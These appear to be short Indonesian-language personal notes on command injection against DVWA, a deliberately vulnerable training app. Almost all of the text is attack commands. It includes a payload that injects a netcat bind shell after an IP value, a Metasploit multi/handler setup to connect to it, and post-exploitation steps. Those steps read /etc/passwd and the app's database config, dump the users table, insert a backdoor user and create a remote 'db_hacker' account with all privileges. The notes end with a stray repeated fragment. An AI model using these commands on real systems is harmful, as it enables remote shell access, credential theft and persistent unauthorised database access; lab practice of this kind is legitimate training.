Command Injection

pake biasa :

server :

$ip_terserah;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

client :

nc $ip_server 4444

pake metasploit :

server :

$ip_terserah;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe

client :

msfconsole

kasih IP server

use multi/handler
set PAYLOAD linux/x86/shell/bind_tcp
show options
set RHOST 192.168.43.207
exploit

bbrp instruksi bagus :

whoami
grep apache /etc/passwd
grep apache /etc/group
ps -eaf | grep http
pwd
ls -ld /var/www/html
ls -ld /var/www/html/dvwa
ls -l /var/www/html/dvwa
ls -l /var/www/html/dvwa/config
cat /var/www/html/dvwa/config/config.inc.php

echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "insert into dvwa.users values ('6','John','Gray','jgray',MD5('abc123'),'NA');" | mysql -uroot
-pdvwaPASSWORD
echo "select * from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
echo "show databases;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; show tables;" | mysql -uroot -pdvwaPASSWORD
echo "use mysql; GRANT ALL PRIVILEGES ON *.* TO 'db_hacker'@'%' IDENTIFIED BY 'abc123' WITH GRANT
OPTION;" | mysql -uroot -pdvwaPASSWORD
echo "select * from mysql.user;" | mysql -uroot -pdvwaPASSWORD

mysql -u db_hacker -h 192.168.43.207 -p
show databases;
quit
date
echo "Your Name"

Wetofu

Command Injection

pake biasa :

pake metasploit :